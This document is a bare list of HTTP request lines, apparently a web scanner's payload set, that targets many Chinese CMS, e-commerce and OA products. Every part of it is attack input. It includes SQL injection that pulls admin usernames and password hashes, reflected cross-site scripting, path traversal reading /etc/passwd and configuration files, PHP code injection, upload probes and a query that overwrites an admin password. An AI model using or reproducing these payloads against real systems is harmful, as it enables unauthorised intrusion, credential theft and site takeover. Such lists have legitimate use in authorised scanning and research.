GET /plus/ajax_common.php?act=hotword&query=%E9%8C%A6%27%20a%3C%3End%201=2%20un%3C%3Eion%20sel%3C%3Eect%201,md5(1122),3%20fr%3C%3Eom%20qs_admin%23
GET /plus/ad_js.php?aid=1&nocache=1
POST /admin.php
GET /resume/?key=xxxx%bf%22;alert(360);//
POST /register.php?do=check
GET /about/?module=../robots.txt&fmodule=7
GET /plus/Promotion.asp
GET /besthr/index.php?type=1%20and%20@%60%5C'%60%20or%20ascii(substring((select%20a_user%20from%20job_admin),1,1))=97%20%23@%60%5C'%60
GET /index.php?controller=site&action=getProduct&specJSON=%7B%20%22people%22:%221'%20and%201=2%20union%20select%20md5(1122),2,3,4,5,6,7,8,9%20and%20'1'='1%22%7D
GET /admin/admin_audit.php?status=1%27%29;phpinfo%28%29;//
POST /index.php?m=announcement&s=admin/notice
GET /item/?c-5,key-1'.html
GET /admin/fileopen.asp?filename=../index.asp
GET /cache/bak_mysql.txt
GET /index.php?case=archive&act=search&keyword=webscan%25%2527%29%09union%09select%090%2C0%2C0%2Cconcat%28username%2Cpassword%29%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%09from%09cmseasy_user%09where%09groupid%3D2%09union%09SELECT%09*%09FROM%09%60cmseasy_archive%60%09WHERE%09%28title%09like%09%2527%25aaaaaaaa
GET /api.php?act=../../robots.txt%00:template_info&api_version=1.0&app=12
GET /product-xxx-%3Cscript%20language=%22php%22%3Eecho%20%22webscan%22;-_set_compile.html
GET /user.php?back_act=http://127.0.0.1%22style=x:expression(alert(42873))%3E
POST /article_cat.php?id=12
POST /passport-verify.html
GET /user/userzone/School/download.aspx?f=/config/ConnectionStrings.config
GET /ajax.php?action=letter&letter=a&moduleid=1//***/union//***/select//***/1,2,concat(username,0x7c,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23//***/from//***/destoon_member//***/where//***/groupid=1//***/limit//***/0,1%23
GET /statistics.php?referer=http://www.google.com/search?q=a%2527),(null,null,null,null,null,null,null,null,(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),(substring((select(select%20concat(user_name,0x7c,password)%20from%20nitc_user%20limit%200,1)),1,62)))a%20from%20information_schema.tables%20group%20by%20a)b))%23&b=c&pageurl=1
POST /inquiry.php?action=inquiry
GET /install/index.php?_m=frontpage&_a=check
POST /api.php?act=get_spec_single&api_version=3.1
GET /index.php?m=video&c=video_for_ck&a=add_f_ckeditor&vid=1&title=a%E9%8C%A6%27,0,0,0,0,0,%28select%20%281%29%20from%20mysql.user%20where%201=1%20aNd%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%29%29%23
POST /api.php?act=get_product_detail_info&api_version=3.1
POST /api.php?act=get_products_list&api_version=3.1
POST /?tools-products.html
POST /index.php?case=admin&act=login&admin_dir=admin&site=default
GET /index.php?case=user&act=space&mid=1
GET /?mod=wap&code=coupon_input&msgcode=ops-success&last[]==1%20union%20/*!select*/%201,1,1,1,1,1,1,1234567890,1%20from%20cenwor_system_members
GET /ajax.php?mod=check&code=email&email=a%2527%2bor%2b%28role_id%3D2%2band%2bascii%28substring%28%252756789%2527%2bfrom%2b2%29%29%3D54%29%2bor%2b%25272%2527%3D%25271&submit=
GET /index.php?m=company&s=space_comments&uid=1and%20(SELECT%201%20from%20(selectcount(*),concat(floor(rand(0)*2),(substring((select(selEctconcat(user,0x7c,password)%20from%20b2bbuilder_admin%20limit%200,1)),1,62)))a%20frominformation_schema.tables%20group%20by%20a)b)
GET /index.php?m=Order&a=index
GET /index.php?app=widget&mod=Category&act=getChild&model_name=Schedule&method=runSchedule&id[task_to_run]=addons/Area)-%3EgetAreaList();print(md5(1122));%23
POST /api/search.php?moduleid=5
POST /item.php?act=ajax&do=subject&op=get_membereffect
GET /include/global/showmod.php?id=9&dbname=met_admin_table%20where%20length(admin_pass)=32--%201
GET /include/hits.php?met_hits=met_download%20cross%20join%20met_admin_table%20where%20met_download.id=met_admin_table.id%20and%20length(admin_pass)=32%20--%201
GET /do/fujsarticle.php?type=like&FileName=../data/8137572f3849aabdwebscan.php&submit=check
GET /?app=vote&controller=vote&action=total&contentid=1%20and%20cast(ascii(substring(version(),1,1))=53%20as%20signed)
POST /?case=manage&act=guestadd&manage=archive&guest=1
GET /article.php?act=list&catid=0&keyword=%d5'%20and(select%201%20from(select%20count(*),concat((select%20(select%20(SELECT%20distinct%20concat(0x7e,0x27,schema_name,0x27,0x7e)%20FROM%20information_schema.schemata%20LIMIT%200,1))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20and%201=1%23
GET /phpsso_server/api.php?op=install&username=phpcms&password=reer&url=123&name=123&authkey=123&apifilename=123&charset=123&type=123&synlogin=123
GET /u.php/member-login?id=header_login%27%22%28%29%26%25%3CScRiPt%20%3Eprompt%2842873%29%3C/ScRiPt%3E&style=1
GET /index.php/cms/item-comment?callback=jsonp1380096883458'%22()%26%25%3Cscript%3Eprompt(42873)%3C/script%3E&iid=114&page=1&view_page=1&_=1380096883791&_ajax_request=
GET /misc.php?mod=syscode&pnumber=C%27%20or%20%60%27%60%20%20or%20@%60%27%27%60%20union%20select%201%20from%20%28select%20count%28*%29,concat%28%28select%20database%28%29%29,floor%28rand%280%29*2%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%20%23%20@%60%27%60
GET /general/reportshop/utils/ExecUserDefFormulas.php?formulas=%3C?php%20echo%20md5('webscan');exit();?%3E
GET /jcms/m_5_1/attach_dwn.jsp?filename=passwd&fpath=/etc/passwd
POST /member.php?act=login&op=forget&rand=U7183
GET /mobile/goods_list.php?type=1s'%20onmouseover=alert(/ed1e83f8d8d90aa943e4add2ce6a4cbf/)%20//
POST /bocadmin/j/uploadify.php
POST /index.php?app=main&func=common&action=upFile&act=upforhtmleditor
POST /lib/upload/upload.php
GET /jcms/setup/publishadmin.jsp
GET /jcms/workflow/sys/que_dictionary.jsp?que_keywords=1'%20and%20'1'='1%20
GET /jcms/m_5_9/downfile.jsp?filename=/etc/passwd&savename=webscan.txt
GET /index.php?app=user&ac=../../../robots.txt%00
GET /index.php?act=index&op=list&city_id=1&area_id=&mall_id=&class_id=2&class_id_1=8&pconsume=&orderby=person_consume&sort=,(select%201%20from(select%20count(*),concat((select%20(select%20(SELECT%20CHAR(100,%2056,%20100,%2057,%2048,%2097,%2097,%2057,%2052,%2051,%20101,%2052,%2097,%20100,%20100,%2050)))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)
GET /index.php?app=/../robots.txt%00
POST /utility/convert/index.php
POST /utility/convert/data/config.inc.php
GET /install/svinfo.php
GET /posthistory.php?tel=IiBhbmQoc2VsZWN0IDEgZnJvbShzZWxlY3QgY291bnQoKiksY29uY2F0KChzZWxlY3QgKHNlbGVjdCAoU0VMRUNUIENIQVIoMTAwLCA1NiwgMTAwLCA1NywgNDgsIDk3LCA5NywgNTcsIDUyLCA1MSwgMTAxLCA1MiwgOTcsIDEwMCwgMTAwLCA1MCkpKSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS50YWJsZXMgbGltaXQgMCwxKSxmbG9vcihyYW5kKDApKjIpKXggZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIGdyb3VwIGJ5IHgpYSkj
POST /wap/index.php?mod=login&action=login
GET /wap/index.php?keywords='and((select%201%20from(select%20count(*),concat((select%20(select%20(SELECT%20CHAR(100,%2056,%20100,%2057,%2048,%2097,%2097,%2057,%2052,%2051,%20101,%2052,%2097,%20100,%20100,%2050)))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a))and'&mod=search&page=2
POST /cart.php
POST /api.php?act=set_shopex_conf&api_version=5.0
GET /report/reportServlet?action=4&url=http://127.0.0.1&file=wait_trace.raq&columns=0&srcType=file&width=-1&height=-1&cachedId=A_2&t_i_m_e=&frame=stu_saveAs_frame--%3E%3C/sCrIpT%3E%3CsCrIpT%3Ealert(42873)%3C/sCrIpT%3E
POST /user.php?act=signin
GET /CompHonorBig.asp?id=44%20and%201=12%20%20union%20select%201,'webscan',3,4,5%20from%20admin
GET /admin_aspcms/_content/_Comments/AspCms_TabAdd.asp
GET /Aboutus.asp?Title=cfreer'%20and%201=2%20union%20select%2055221122%20from%20admin
GET /ProductShow.asp?ID=98%20and%201=1%20union%20select%201,'webscan',3,4,5,55221122,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21%20from%20admin
GET /DownloadShow.asp
GET /NewsClass.asp
GET /plug/collect/AspCms_CollectFun.asp?action=getlinklist&todo=this&CollectID=1%20and%20%202=iif((1=1),2,chr(97))
GET /index.php?case=tag&act=show&tag=%2522%20union%20select%200x2D3120756E696F6E2073656C65637420312C307833313239323037353645363936463645323037333635364336353633373432303331324333323243333332433644363433353238333533353332333233313331333233323239324333353243333632433337324333383243333932433331333032433331333132433331333232433331333332433331333432433331333532433331333632433331333732433331333832433331333932433332333032433332333132433332333232433332333332433332333432433332333532433332333632433332333732433332333832433332333932433333333032433333333132433333333232433333333332433333333432433333333532433333333632433333333732433333333832433333333932433334333032433334333132433334333232433334333332433334333432433334333532433334333632433334333732433334333832433334333932433335333032433335333132433335333232433335333332433335333432433335333532433335333632433335333732433335333832303636373236463644323036333644373336353631373337393546373537333635373232332C332D2D,2%23
GET /Search.asp?GetType=MainInfo&SubSys=SD&Keyword=1&s_area=1%20union%20select%20df3342ecbf86e257()
GET /temp/compiled/pages.lbi.php/%22%3C/form%3E%3CsCripT%3Ealert(42873)%3C/scRipt%3E
POST /api.php?act=search_dly_type&api_version=1.0
GET /api/uc.php?code=e58bJh4lGn7%2F87F38CD3nphwoQNenQoOElYFu9%2FBvZV2gsgxPnmRmq3iJZcx%2FF1LPelzduVe3ZFJOD4Y0vpB388niaie8ECa%2FYA%2BqA13TPGzW5EpO%2FHaShEiHdaEqgyeRf%2Bh1EBCq3UASAPet%2BTI4R8tIKfU05ENmo5bK8Fj6DHvC9%2BtIksTeaOgmBzDwHdMbbLQwjGtvauIjUNnf2FglhdFD3mQdDiOq2rSSWxWPkQEYV0Z5ihe2YhVrmUlAVJqSshZ3wh5zdfjWzCUnP4I7k3f%2B2khp64tgUEbwIdcoV38Ei47PSd5h02j9uBvIs7yg%2ByfJ7zp5ArNiq3wuDcy9LtAXup68g
GET /?m=vote&id=&vid=1,3)%20and%20%20webscan1122%23
GET /aboutus.php?type=1'and%20(select%201%20from%20(select%20count(*),concat(md5(521122),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23
POST /lostpass.php?md5=3&userid=-1'%20and%20(select%201%20from%20(select%20count(*),concat(md5(55221122),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23
GET /index.php?m=message&s=inquiry_basket
GET /index.php?m=message&s=inquire&userid=1)%20UnIon%20select%201,12,123%20from%20webscan%23
GET /index.php?m=announcement&s=admin/notice_manager&action=modify&id=1212%20UnIon%20select%201,2,concat(user,0x7c,password),4,5,6,7,8%20from%20webscan%23
GET /index.php?m=company&s=space_mail&tid=1)%20and%201=websec%20%23
GET /index.php?m=company&s=admin/exportexcel&ordrby=user%20and%201=websec%23
GET /index.php?m=news&s=admin/news&newsid=1%20and%20(SELECT%201%20from%20websec)
GET /notes.php?action=view&nid=1-websec
GET /?mod=account&code=Sendcheckmail&uname=-1%2527%20or%201=1%23
GET /general/workflow/list/input_form/data_fetch.php?run_id=1%20and%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),(substring((select%20md5(1122)%20from%20%60user%60%20limit%201),1,62)))a%20from%20information_schema.tables%20group%20by%20a)b)%23
GET /general/score/flow/scoredate/result.php?FLOW_ID=11%bf%27%20and%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),(substring((select%20md5(1122)%20from%20user%20limit%201),1,62)))a%20from%20information_schema.tables%20group%20by%20a)b)%23
GET /pda/auth.php?P=%60%df'and%20(select%201%20from%20%20(select%20count(*),concat((select%20md5(1122)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23&PASSWORD=test
GET /logincheck.php?UNAME=reer%df'and%20(select%201%20from%20%20(select%20count(*),concat((select%20md5(1122)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23&PASSWORD=test
GET /Search.asp
GET /suggestwordList.php?searchWord=a&language=1%20and%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),(substring((select(select%20md5(1122)%20from%20nitc_user%20limit%200,1)),1,62)))a%20from%20information_schema.tables%20group%20by%20a)b)
GET /ProductBuy.asp?UpdateOrder=%E6%9B%B4%E6%96%B0%E9%80%89%E6%8B%A9
GET /cycle_image.php?language=999%20union%20select%201,2,3,(select%20md5(1122)%20from%20nitc_user%20limit%200,1),5,file,7,8,9,0,1%20from%20nitc_ad%23%5Een
GET /download.php?tfile=%5C..%5C..%5Cconfig.php
GET /plugins/phpdisk_client/passport.php?YWN0aW9uPXBhc3Nwb3J0bG9naW4mdXNlcm5hbWU9MSZwYXNzd29yZD0xJnNpZ249NjdBMTAwNDc5QTQ4OTMyOUEzMTIxRUM0QTM2M0FBNzcmdHBmPXBkX3VzZXJzIHdoZXJlIGdpZD0xIGFuZCAoYXNjaWkoc3Vic3RyaW5nKChzZWxlY3QgdXNlcm5hbWUgZnJvbSBwZF91c2VycyB3aGVyZSBnaWQ9MSBsaW1pdCAwLDEpLDEsMSkpPTk4KSBsaW1pdCAwLDEj
POST /api.php?act=search_sub_regions&api_version=1.0
GET /index.php?c=com_index&m=yp&userid=12%22%3E%3Ciframe%20src=javascript:alert(42873)%3E
GET /index.php?a=lists&agent=&bedroom=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=4%22%20onmouseover=alert(42873)%20y=&price=&rent_mode=&zone=3363
GET /index.php?a=lists&agent=&bedroom=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=&price=2000_3000%22%20onmouseover=alert(42873)%20y=&rent_mode=&zone=3363
GET /index.php?a=lists&agent=&bedroom=&c=index&catid=8&city=beijing%22%20onmouseover=alert(42873)%20y=&m=content&page=&pay_type_int=&price=&rent_mode=&zone=3363
GET /index.php?a=lists&agent=&bedroom=4_100%22%20onmouseover=alert(42873)%20y=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=&price=&rent_mode=&zone=336
GET /index.php?a=lists&agent=2%22%20onmouseover=alert(42873)%20y=&bedroom=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=&price=&rent_mode=&zone=3363
GET /index.php?a=lists&agent=&bedroom=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=&price=&rent_mode=2%22%20onmouseover=alert(42873)%20y=&zone=3363
GET /index.php?m=yp&c=index&a=lists&areaid=37%20%20onmouseover%3Dprompt%2842873%29%20&catid=10&price=1_500&page=1&order=4
GET /index.php?m=yp&c=index&a=lists&areaid=37&catid=10&price=%22%20onmouseover=prompt(42873)%20&page=1&order=4
GET /index.php?m=yp&c=index&a=lists&areaid=12&catid=114&price=&tid=1%22%20onmouseover=prompt(42873)%20&page=1&order=1
GET /index.php?a=lists&agent=&bedroom=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=4%20onmonmouseoverouseover=alert(42873)%20y=&price=&rent_mode=&zone=3363
GET /index.php?a=lists&agent=&bedroom=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=&price=2000_3000%20onmonmouseoverouseover=alert(42873)%20y=&rent_mode=&zone=3363
GET /index.php?a=lists&agent=&bedroom=&c=index&catid=8&city=beijing%20onmouonmouseoverseover=alert(42873)%20y=&m=content&page=&pay_type_int=&price=&rent_mode=&zone=3363
GET /index.php?a=lists&agent=&bedroom=4_100%20onmouonmouseoverseover=alert(42873)%20y=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=&price=&rent_mode=&zone=336
GET /index.php?a=lists&agent=2%20onmoonmouseoveruseover=alert(42873)%20y=&bedroom=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=&price=&rent_mode=&zone=3363
GET /index.php?a=lists&agent=&bedroom=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=&price=&rent_mode=2%20onmoonmouseoveruseover=alert(42873)%20y=&zone=3363
GET /manage/WAP/Other/AddDalen.aspx?menu=add
GET /login.php?SSL_CLIENT_S_DN_Email=%27+or+1=%28select+1+from+%28select+count%28*%29,concat%28%28SELECT+md5%281122%29%29,floor%28rand%280%29*2%29%29x+from+information_schema.tables+group+by+x%29a%29%23/wapc/5000_0005_003
GET /install/step4.aspx
HEAD /DataBase/%23zhi_rui_v_Base.mdb
GET /manage/Shop/profile/LmUserManage.aspx
GET /API/GetPageHtml.aspx
GET /stat/stat.aspx?statid=1'%20And%201=(select%20db_name())%20--
GET /manage/Zone/TemplateList.aspx?OpenerText=a');%7Dalert(42873);%7B//
GET /msgChat/download.jsp?url=msgChat/download.jsp
GET /admin.php
GET /index.php?m=wap&siteid=1&a=big_image&url=aHR0cDovL3hzc3Rlc3QuY29tIiBvbmVycm9yPSJqYXZhc2NyaXB0OmFsZXJ0KDQyODczKTs=
POST /index/searchInfoTcontentByCategory.action
POST /emlib4/system/datasource/selectrecordset.aspx
POST //index.php?app=main&func=common&action=commonJob&act=getAllUserListsInDeptTree&group=getGroupMember
GET /home.php?action=article&id=1&mytypeId=-2%20union%20select%20concat(0x7e,md5(1122),0x7e)%20from%20v_user%20where%20uid=1
GET /web/common/getfile.jsp?p=..%5C%5C..%5C%5C..%5C%5C..%5C%5Cetc%5C%5Cpasswd
GET /ResultXml.aspx?column=banner&table=sys.v_$version%20where%20rownum=1--&k=jwc
GET /index.php/list-10%20UNION/**/all/**/SELECT/**/listid,listid1,modelid,siteid,norder,ncount,ncountall,(select%20concat(0x23,md5(1122),0x23)%20from%20kc_admin%20where%20adminid=1),klistname,kkeywords,kdescription,kimage,isblank,iscontent,kcontent,klistpath,ktemplatelist1,ktemplatelist2,nlistnumber,kpathmode,ktemplatepage1,ktemplatepage2,npagenumber,ispublish1,ispublish2,norder1,norder3,norder4,norder5,nupdatelist,nupdatepage,isexist,nlist,npage,gid,ismenu1,ismenu2,ismenu3,ismenu4,ismenu5,ismap,klanguage,gidpublish%20from%20king_list%20where%20listid=4%23.html
GET /index.php?m=video&c=video_for_ck&a=add_f_ckeditor&vid=1&title=1122&description=a%E9%8C%A6%27,0,0,0,0,0,%28select%20%281%29%20from%20mysql.user%20where%201=1%20aNd%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%29%29%23
GET /customform/CustomFormList.aspx?pageindex=1&divid=530602186870.fs_sys_user%20where%201=(select%20username%20%20from%20fs_sys_user%20where%20id=1);--.1.1
GET /module/AIP/upload.php?T_ID=1&RUN_ID=1%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
GET /module/sel_seal/get.php?ID=%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
GET /ispirit/go.php?LOGIN_UID=%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
GET /ispirit/logincheck.php?USEING_KEY=2&USERNAME=abc%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
GET /ispirit/check_secure_key.php?USERNAME=%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
GET /interface/auth.php?&PASSWORD=1&USER_ID=%df'%20and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
POST /module/AIP/upload.php?RUN_ID=1&T_ID=1
GET /general/score/flow/scoredate/result.php?FLOW_ID=11%bf%27%20and%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),(substring((select%20md5(1122)%20from%20user%20limit%201),1,62)))a%20from%20information_schema.tables%20group%20by%20a)b)%23
GET /general/workflow/list/input_form/data_fetch.php?run_id=1%20and%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),(substring((select%20md5(1122)%20from%20%60user%60%20limit%201),1,62)))a%20from%20information_schema.tables%20group%20by%20a)b)%23
GET /pda/auth.php?P=%60%df'and%20(select%201%20from%20%20(select%20count(*),concat((select%20md5(1122)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23&PASSWORD=test
GET /logincheck.php?USEING_KEY=2&USERNAME=cfreer%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
GET /ispirit/go.php?LOGIN_UID=%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
GET /ispirit/check_secure_key.php?USERNAME=%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
GET /interface/auth.php?&PASSWORD=1&USER_ID=%df'%20and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
GET /module/sel_seal/get.php?ID=%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
GET /portal/group/articl.php?portal_id=3&column_id=3&content_id=184)%20and%20(select%201%20from%20(select%20count(*),concat(0x3a,md5(1122),0x3a)x%20from%20information_schema.tables%20group%20by%20x)a)%20and%20(1)=(1
POST /index.php?m=company&s=admin/business_info_list
GET /index.php?case=manage&act=delete&manage=orders&guest=1&id=-1
POST /getpwd4.asp
GET /?m=offer&s=offer_list&id=1-webscan%23
POST /MemberLogin.asp
GET /views.asp
GET /basket.asp?h%77_id=513%20and%201=2
GET /protextbox.asp?hw_%69d=513%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,chr(88),16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51%20from%20admin
POST /index.php?app=tag&ac=add&ts=do
GET /member/index.php?ugid31=51'%20and%20'1122'='12
GET /siteserver/cms/console_tableMetadata.aspx?ENName=cms_Content%27%29%20and%200%3C%28select%20top%201%20isnull%28cast%28%5Breer1122%5D%20as%20nvarchar%284000%29%29%2Cchar%2832%29%29%20from%20bairong_Administrator%20where%201%3D1%20and%20UserName%20not%20in%20%28select%20top%200%20UserName%20from%20bairong_Administrator%20where%201%3D1%20group%20by%20UserName%29%29%3B--
GET /UserCenter/platform/user.aspx?page=2&UnLock=True&UserNameCollection=1')%20and%200%3C(select%20webscan);--
GET /search.php?mod=information&ids=1-webscan&catid=1
POST /box.php?
GET /siteserver/cms/modal_contentTagAdd.aspx?PublishmentSystemID=2109&TagName=1111'%20and%20char(106)=0%20--
GET /siteserver/UserRole/background_userAdd.aspx?UserName=1122'%20and%20char(106)%20=1%20--&ReturnUrl=../cms/console_user.aspx
GET //siteserver/cms/background_channelsGroup.aspx?publishmentSystemID=1615&nodeGroupName=1122'%20and%20char(106)%20=1%20--
GET /siteserver/cms/modal_contentGroupAdd.aspx?PublishmentSystemID=2222&GroupName=123'%20and%20char(106)=1%20--
GET /downLoadFile.action?filePath=/WEB-INF/web.xml
GET /siteserver/UserRole/modal_userView.aspx?UserName=dd'%20and%201=char(106);--
GET /SubmmitOrderHandler.aspx?Action=GetUserShippingAddress&ShippingId=2
GET /job/job.php?lang=cn&id=2&settings[met_column]=met_admin_table%20where%201=2--%201
GET /searchLines.aspx?LName=h%25';
GET /ProductBuy.Asp
GET /newssearch.aspx?skey=1%25'%20and%201=char(106)%20--
GET /searchLines.aspx?LName=h&t=webscan()'
GET /viewlist.aspx?typeid=webscan()'
GET /company/index.php?datetime=&page=2&position=&profession=&type=1%20and%201=2&workadd=
POST /resource/avatar/avatar.php?a=uploadavatar&input=uid%3D1122.php
GET /?mod=account&code=Login_callback&cmd=a&from=../../../robots.txt%00
GET /admin/admin/getpassword.php?action=next4&abt_type=2&password=123456&passwordsr=123456&array[0]=reer1122
GET /index.php?index=a&skin=default/../&dataoptimize_html=/../../templates/default/images/css/metinfo.css
GET /gallery--p,0,1122%20and%200-0---1.html
GET /?m=info.detail&id=1-webscan
GET /misc.php?mod=getuserinfo&uid=-1
POST /?m=city.getSearch&index=reer
GET /?m=info&rewrite=1'%20union%20select%201,concat(0x23,md5(1122),0x23)%20from%20my_admin%20where%20id=1%20--%20a
GET /admin_aspcms/_content/_Spec/AspCms_SpecAdd.asp
POST /index.php?act=ajax&do=datacall&in_ajax=1&m=index&op=get_datacall
GET /Product.asp
POST /user/getpassword.asp
GET /admin_aspcms/_expand/_form/AspCms_FormFun.asp?action=del&FormField=reer&id=1122
POST /plus/ajax_user.php?act=check_email
POST /plus/ajax_user.php?act=check_usname
GET /HitCount.asp?LX=reer%20where%201=1%20union%20select%20Password%20from%20Admin
GET /ScoreProductSearchList.html?ProductCategoryID=12%20and%20%20@@version=1%20--
GET /ScoreProductSearchList.aspx?ProductCategoryID=12&Score1=2&Score2=3%20and%20char(106)=1%20--
GET /ScoreProductSearchList.aspx?ProductCategoryID=12&Score1=3%20and%20char(106)=1%20--
GET /index.php?app=user&ac=plugin&in=../../robots.txt%00
POST /member.php?act=login&op=forget
GET /item.php?act=search&keyword=%d5'%20and(select%201%20from(select%20count(*),concat((select%20(select%20(SELECT%20distinct%20concat(0x7e,0x27,char(99,102,114,101,101,114),0x27,0x7e)%20FROM%20information_schema.schemata%20LIMIT%200,1))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20and%201=1%23&searchsort=subject&catid=0&ordersort=addtime&ordertype=asc&searchsubmit=yes
GET /?product-75-1@%7C1122%22%3E%3Ciframe%20src=javascript:this[%22%5Cx61%5Cx6c%5Cx65%5Cx72%5Cx74%22](%2242873%22)%20-index.html
GET /index.php?product-%22%3E%3Ciframe%20src=javascript:window[%22%5Cx61%5Cx6c%5Cx65%5Cx72%5Cx74%22](42873)%20-1122-viewpic.html
GET /?gallery-1--1--'%20%3E%3Ciframe%20src=javascript:window[%22%5Cx61%5Cx6c%5Cx65%5Cx72%5Cx74%22](42873)%20'--grid.html
GET /index.php?act=show_groupbuy&op=groupbuy_list&groupbuy_area=&groupbuy_class=&groupbuy_price=1&groupbuy_order_key=price&groupbuy_order=asc,%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),%20md5(1122))a%20from%20information_schema.tables%20group%20by%20a)b);%23
GET /index.php?act=search&key=click&order=desc,%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),%20md5(1122))a%20from%20information_schema.tables%20group%20by%20a)b);%23&cate_id=8
GET /wap/index.php
GET /deals?end_time=1&searchName=%25'%20AND%201=1%20AND%20'%25'='&start_time=1
GET /statistics.php?pageurl=pageurl&referer=http://www.baidu.com/?wd=aaaa%2527),((select%201%20from%20(select%20count(*),concat(version(),0x7c,md5(1122),0x7c,floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a),2,3,4,5,6,7,8,9)%23
GET /member/index.php
GET /wap/index.php?mod=space&userid=1'%20and%20extractvalue(1,(select%20md5(1122)from%20my_admin%20limit%201));%20%23
GET /index.php?act=index&op=list&city_id=1&area_id=&mall_id=&class_id=3&class_id_1=22&pconsume=&orderby=add_time%20asc,%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),%20md5(1122))a%20from%20information_schema.tables%20group%20by%20a)b);%23&sort=asc
POST /video.php
POST /news.php?classid=2
GET /ajax.php?action=dig&module=members%20set%20username=00000,password=0x3235306366386235316337373366336638646338623462653836376139613032%20where%20uid=1%20--%20a
